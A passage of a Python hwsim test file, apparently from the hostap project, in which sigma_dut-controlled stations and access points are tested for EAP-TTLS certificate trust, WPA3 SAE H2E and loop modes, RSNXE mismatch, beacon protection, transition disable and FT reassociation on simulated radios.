cmd = ("sta_set_security,type,eapttls,interface,%s,ssid,%s,keymgmttype,wpa2,encType,AES-CCMP,PairwiseCipher,AES-CCMP-128,trustedRootCA," + name + ".ca.pem,username,DOMAIN\mschapv2 user,password,password") % (ifname, ssid)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, ssid),
timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-TLS-CERT-ERROR"], timeout=15)
if ev is None:
raise Exception("Server certificate validation failure not reported")
res = sigma_dut_cmd_check("dev_exec_action,program,WPA3,interface,%s,ServerCertTrust,Accept" % ifname)
if not tofu and "ServerCertTrustResult,Accepted" in res:
raise Exception("Server certificate trust override was accepted unexpectedly")
if tofu and "ServerCertTrustResult,Accepted" not in res:
raise Exception("Server certificate trust override was not accepted")
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
dev[0].dump_monitor()
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_eap_ttls_uosc_ca_mistrust(dev, apdev, params):
"""sigma_dut controlled STA and EAP-TTLS with UOSC when CA is not trusted"""
check_domain_suffix_match(dev[0])
logdir = params['logdir']
with open("auth_serv/ca.pem", "r") as f:
with open(os.path.join(logdir,
"sigma_dut_eap_ttls_uosc_ca_mistrust.ca.pem"),
"w") as f2:
f2.write(f.read())
ssid = "test-wpa2-eap"
params = int_eap_server_params()
params["ssid"] = ssid
params["ca_cert"] = "auth_serv/rsa3072-ca.pem"
params["server_cert"] = "auth_serv/rsa3072-server.pem"
params["private_key"] = "auth_serv/rsa3072-server.key"
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, cert_path=logdir)
try:
cmd = "sta_set_security,type,eapttls,interface,%s,ssid,%s,keymgmttype,wpa2,encType,AES-CCMP,PairwiseCipher,AES-CCMP-128,trustedRootCA,sigma_dut_eap_ttls_uosc_ca_mistrust.ca.pem,username,DOMAIN\mschapv2 user,password,password,domainSuffix,w1.fi" % (ifname, ssid)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, ssid),
timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-TLS-CERT-ERROR"], timeout=10)
if ev is None:
raise Exception("Server certificate error not reported")
res = sigma_dut_cmd_check("dev_exec_action,program,WPA3,interface,%s,ServerCertTrust,Accept" % ifname)
if "ServerCertTrustResult,Accepted" not in res:
raise Exception("Server certificate trust was not accepted")
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
dev[0].dump_monitor()
finally:
stop_sigma_dut(sigma)
def start_sae_pwe_ap(apdev, sae_pwe):
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_groups'] = '19'
params['sae_pwe'] = str(sae_pwe)
return hostapd.add_ap(apdev, params)
def connect_sae_pwe_sta(dev, ifname, extra=None):
dev.dump_monitor()
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
cmd = "sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", "12345678")
if extra:
cmd += "," + extra
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
dev.wait_disconnected()
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
dev.dump_monitor()
def no_connect_sae_pwe_sta(dev, ifname, extra=None):
dev.dump_monitor()
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
cmd = "sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", "12345678")
if extra:
cmd += "," + extra
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
ev = dev.wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-NETWORK-NOT-FOUND"], timeout=10)
if ev is None or "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection result")
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
dev.dump_monitor()
def test_sigma_dut_sae_h2e(dev, apdev):
"""sigma_dut controlled SAE H2E association (AP using loop+H2E)"""
check_sae_capab(dev[0])
start_sae_pwe_ap(apdev[0], 2)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, sae_h2e=True)
try:
connect_sae_pwe_sta(dev[0], ifname)
connect_sae_pwe_sta(dev[0], ifname, extra="sae_pwe,h2e")
connect_sae_pwe_sta(dev[0], ifname, extra="sae_pwe,loop")
res = sigma_dut_cmd("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,sae_pwe,unknown" % (ifname, "test-sae", "12345678"))
if res != "status,ERROR,errorCode,Unsupported sae_pwe value":
raise Exception("Unexpected error result: " + res)
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_sae_h2e_ap_loop(dev, apdev):
"""sigma_dut controlled SAE H2E association (AP using loop-only)"""
check_sae_capab(dev[0])
start_sae_pwe_ap(apdev[0], 0)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, sae_h2e=True)
try:
connect_sae_pwe_sta(dev[0], ifname)
connect_sae_pwe_sta(dev[0], ifname, extra="sae_pwe,loop")
no_connect_sae_pwe_sta(dev[0], ifname, extra="sae_pwe,h2e")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_sae_h2e_ap_h2e(dev, apdev):
"""sigma_dut controlled SAE H2E association (AP using H2E-only)"""
check_sae_capab(dev[0])
start_sae_pwe_ap(apdev[0], 1)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, sae_h2e=True)
try:
connect_sae_pwe_sta(dev[0], ifname)
no_connect_sae_pwe_sta(dev[0], ifname, extra="sae_pwe,loop")
connect_sae_pwe_sta(dev[0], ifname, extra="sae_pwe,h2e")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_ap_sae_h2e(dev, apdev, params):
"""sigma_dut controlled AP with SAE H2E"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_h2e.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, sae_h2e=True, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
for sae_pwe in [0, 1, 2]:
dev[0].request("SET sae_groups ")
dev[0].set("sae_pwe", str(sae_pwe))
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].dump_monitor()
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_ap_sae_h2e_only(dev, apdev, params):
"""sigma_dut controlled AP with SAE H2E-only"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_h2e.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, sae_h2e=True, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,sae_pwe,h2e")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
dev[0].set("sae_pwe", "1")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].dump_monitor()
dev[0].set("sae_pwe", "0")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-NETWORK-NOT-FOUND"], timeout=10)
dev[0].request("DISCONNECT")
if ev is None or "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection result")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_ap_sae_loop_only(dev, apdev, params):
"""sigma_dut controlled AP with SAE looping-only"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_h2e.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, sae_h2e=True, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,sae_pwe,loop")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
dev[0].set("sae_pwe", "0")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].dump_monitor()
dev[0].set("sae_pwe", "1")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-NETWORK-NOT-FOUND"], timeout=10)
dev[0].request("DISCONNECT")
if ev is None or "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection result")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_sae_h2e_loop_forcing(dev, apdev):
"""sigma_dut controlled SAE H2E misbehavior with looping forced"""
check_sae_capab(dev[0])
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_pwe'] = '1'
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,IgnoreH2E_RSNXE_BSSMemSel,1" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
ev = dev[0].wait_event(["SME: Trying to authenticate with"], timeout=10)
if ev is None:
raise Exception("No authentication attempt reported")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.5)
if ev is not None:
raise Exception("Unexpected connection reported")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sae_h2e_enabled_group_rejected(dev, apdev):
"""sigma_dut controlled SAE H2E misbehavior with rejected groups"""
check_sae_capab(dev[0])
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_groups'] = "19 20"
params['sae_pwe'] = '1'
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, sae_h2e=True)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,ECGroupID_RGE,19 123" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
ev = dev[0].wait_event(["SME: Trying to authenticate with"], timeout=10)
if ev is None:
raise Exception("No authentication attempt reported")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.5)
if ev is not None:
raise Exception("Unexpected connection reported")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_sae_h2e_rsnxe_mismatch(dev, apdev):
"""sigma_dut controlled SAE H2E misbehavior with RSNXE"""
check_sae_capab(dev[0])
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_groups'] = "19"
params['sae_pwe'] = '1'
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, sae_h2e=True)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,RSNXE_Content,EapolM2:F40100" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
ev = dev[0].wait_event(["SME: Trying to authenticate with"], timeout=10)
if ev is None:
raise Exception("No authentication attempt reported")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.5)
if ev is not None:
raise Exception("Unexpected connection reported")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_ap_sae_h2e_rsnxe_mismatch(dev, apdev, params):
"""sigma_dut controlled SAE H2E AP misbehavior with RSNXE"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_h2e_rsnxe_mismatch.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, sae_h2e=True, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,sae_pwe,h2e,RSNXE_Content,EapolM3:F40100")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
dev[0].set("sae_pwe", "1")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412", wait_connect=False)
ev = dev[0].wait_event(["Associated with"], timeout=10)
if ev is None:
raise Exception("No indication of association seen")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-DISCONNECTED"], timeout=10)
dev[0].request("DISCONNECT")
if ev is None:
raise Exception("No disconnection seen")
if "CTRL-EVENT-DISCONNECTED" not in ev:
raise Exception("Unexpected connection")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_ap_sae_h2e_group_rejection(dev, apdev, params):
"""sigma_dut controlled AP with SAE H2E-only and group rejection"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_h2e_group_rejection.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, sae_h2e=True, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,sae_pwe,h2e")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups 21 20 19")
dev[0].set("sae_pwe", "1")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
addr = dev[0].own_addr()
res = sigma_dut_cmd_check("dev_exec_action,program,WPA3,Dest_MAC,%s,Rejected_DH_Groups,1" % addr)
if "DHGroupVerResult,21 20" not in res:
raise Exception("Unexpected dev_exec_action response: " + res)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_ap_sae_h2e_anti_clogging(dev, apdev, params):
"""sigma_dut controlled AP with SAE H2E and anti-clogging token"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_h2e_anti_clogging.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, sae_h2e=True, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,SAE,PSK,12345678,AntiCloggingThreshold,0")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].set("sae_groups", "")
dev[0].set("sae_pwe", "2")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_ap_5ghz(dev, apdev, params):
"""sigma_dut controlled AP on 5 GHz"""
run_sigma_dut_ap_channel(dev, apdev, params, 36, '11na', 5180,
check_signal="WIDTH=20 MHz")
def test_sigma_dut_ap_ht40plus(dev, apdev, params):
"""sigma_dut controlled AP and HT40+"""
run_sigma_dut_ap_channel(dev, apdev, params, 36, '11na', 5180,
extra="width,40", check_signal="WIDTH=40 MHz")
def test_sigma_dut_ap_ht40minus(dev, apdev, params):
"""sigma_dut controlled AP and HT40-"""
run_sigma_dut_ap_channel(dev, apdev, params, 40, '11na', 5200,
extra="width,40", check_signal="WIDTH=40 MHz")
def test_sigma_dut_ap_vht40(dev, apdev, params):
"""sigma_dut controlled AP and VHT40"""
run_sigma_dut_ap_channel(dev, apdev, params, 36, '11ac', 5180,
extra="width,40", check_signal="WIDTH=40 MHz",
program="VHT")
def test_sigma_dut_ap_vht80(dev, apdev, params):
"""sigma_dut controlled AP and VHT80"""
run_sigma_dut_ap_channel(dev, apdev, params, 36, '11ac', 5180,
extra="width,80", check_signal="WIDTH=80 MHz",
program="VHT")
def run_sigma_dut_ap_channel(dev, apdev, params, channel, mode, scan_freq,
extra=None, check_signal=None, program=None):
logdir = params['prefix'] + ".sigma-hostapd"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
subprocess.call(['iw', 'reg', 'set', 'US'])
cmd = "ap_reset_default"
if program:
cmd += ",program," + program
sigma_dut_cmd_check(cmd)
cmd = "ap_set_wireless,NAME,AP,CHANNEL,%d,SSID,test-psk,MODE,%s" % (channel, mode)
if extra:
cmd += "," + extra
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(params['prefix'] + ".sigma-conf", "wb") as f2:
f2.write(f.read())
dev[0].connect("test-psk", psk="12345678", scan_freq=str(scan_freq))
sig = dev[0].request("SIGNAL_POLL")
logger.info("SIGNAL_POLL:\n" + sig.strip())
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
sigma_dut_cmd_check("ap_reset_default")
if check_signal and check_signal not in sig:
raise Exception("Unexpected SIGNAL_POLL data")
finally:
stop_sigma_dut(sigma)
subprocess.call(['iw', 'reg', 'set', '00'])
dev[0].flush_scan_cache()
def test_sigma_dut_beacon_prot(dev, apdev):
"""sigma_dut controlled STA and beacon protection"""
ssid = "test-pmf-required"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params["ieee80211w"] = "2"
params["beacon_prot"] = "1"
try:
hapd = hostapd.add_ap(apdev[0], params)
except Exception as e:
if "Failed to enable hostapd interface" in str(e):
raise HwsimSkip("Beacon protection not supported")
raise
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,type,PSK,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required,BeaconProtection,1" % (ifname, "test-pmf-required", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-pmf-required"),
timeout=10)
sigma_dut_wait_connected(ifname)
time.sleep(1)
check_mac80211_bigtk(dev[0], hapd)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_beacon_prot(dev, apdev, params):
"""sigma_dut controlled AP and beacon protection"""
logdir = params['prefix'] + ".sigma-hostapd"
Wlantest.setup(None)
wt = Wlantest()
wt.flush()
wt.add_passphrase("12345678")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSK,12345678,PMF,Required,BeaconProtection,1")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
bssid = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP")
bssid = bssid.split(',')[3]
dev[0].connect("test-psk", key_mgmt="WPA-PSK-SHA256",
psk="12345678", scan_freq="2412",
ieee80211w="2", beacon_prot="1")
time.sleep(1)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
valid_bip = wt.get_bss_counter('valid_bip_mmie', bssid)
invalid_bip = wt.get_bss_counter('invalid_bip_mmie', bssid)
missing_bip = wt.get_bss_counter('missing_bip_mmie', bssid)
logger.info("wlantest BIP counters: valid=%d invalid=%d missing=%d" % (valid_bip, invalid_bip, missing_bip))
if valid_bip < 0 or invalid_bip > 0 or missing_bip > 0:
raise Exception("Unexpected wlantest BIP counters: valid=%d invalid=%d missing=%d" % (valid_bip, invalid_bip, missing_bip))
def test_sigma_dut_ap_transition_disable(dev, apdev, params):
"""sigma_dut controlled AP and transition disabled indication"""
check_sae_capab(dev[0])
logdir = params['prefix'] + ".sigma-hostapd"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,PMF,Required,Transition_Disable,1,Transition_Disable_Index,0")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].set("sae_groups", "")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
ev = dev[0].wait_event(["TRANSITION-DISABLE"], timeout=1)
if ev is None:
raise Exception("Transition disable not indicated")
if ev.split(' ')[1] != "01":
raise Exception("Unexpected transition disable bitmap: " + ev)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_transition_disable_change(dev, apdev, params):
"""sigma_dut controlled AP and transition disabled indication change"""
check_sae_capab(dev[0])
logdir = params['prefix'] + ".sigma-hostapd"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,PMF,Required")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].set("sae_groups", "")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
ev = dev[0].wait_event(["TRANSITION-DISABLE"], timeout=1)
if ev is not None:
raise Exception("Unexpected transition disable indication")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
dev[0].dump_monitor()
sigma_dut_cmd_check("ap_set_rfeature,NAME,AP,Transition_Disable,1,Transition_Disable_Index,0")
dev[0].request("RECONNECT")
dev[0].wait_connected()
ev = dev[0].wait_event(["TRANSITION-DISABLE"], timeout=1)
if ev is None:
raise Exception("Transition disable not indicated")
if ev.split(' ')[1] != "01":
raise Exception("Unexpected transition disable bitmap: " + ev)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ft_rsnxe_used_mismatch(dev, apdev):
"""sigma_dut controlled FT protocol with RSNXE Used mismatch"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid)
params['wpa_key_mgmt'] = 'SAE FT-SAE'
params["ieee80211w"] = "2"
params['sae_password'] = "hello"
params['sae_pwe'] = "2"
params['mobility_domain'] = 'aabb'
bssid = apdev[0]['bssid'].replace(':', '')
params['nas_identifier'] = bssid + '.nas.example.com'
params['r1_key_holder'] = bssid
params['pmk_r1_push'] = '0'
params['r0kh'] = 'ff:ff:ff:ff:ff:ff * 00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff'
params['r1kh'] = '00:00:00:00:00:00 00:00:00:00:00:00 00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff'
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,AKMSuiteType,8;9" % (ifname, "test-sae", "hello"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
dev[0].dump_monitor()
bssid2 = apdev[1]['bssid'].replace(':', '')
params['nas_identifier'] = bssid2 + '.nas.example.com'
params['r1_key_holder'] = bssid2
hapd2 = hostapd.add_ap(apdev[1], params)
bssid2 = hapd2.own_addr()
sigma_dut_cmd_check("sta_reassoc,interface,%s,Channel,1,bssid,%s" % (ifname, bssid2))
count = 0
for i in range(5):
ev = dev[0].wait_event(["Trying to associate",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Connection timed out")
if "CTRL-EVENT-CONNECTED" in ev:
break
count += 1
dev[0].dump_monitor()
if count != 1:
raise Exception("Unexpected number of association attempts for the first FT protocol exchange (expecting success)")
sigma_dut_cmd_check("sta_set_rfeature,interface,%s,prog,WPA3,ReassocReq_RSNXE_Used,1" % ifname)
sigma_dut_cmd_check("sta_reassoc,interface,%s,Channel,1,bssid,%s" % (ifname, bssid))
count = 0
for i in range(5):
ev = dev[0].wait_event(["Trying to associate",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Connection timed out")
if "CTRL-EVENT-CONNECTED" in ev:
break
count += 1
dev[0].dump_monitor()
if count != 2:
raise Exception("Unexpected number of association attempts for the second FT protocol exchange (expecting failure)")
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_ft_rsnxe_used_mismatch(dev, apdev, params):
"""sigma_dut controlled AP with FT and RSNXE Used mismatch"""
logdir = params['prefix'] + ".sigma-hostapd"
conffile = params['prefix'] + ".sigma-conf"
check_sae_capab(dev[0])
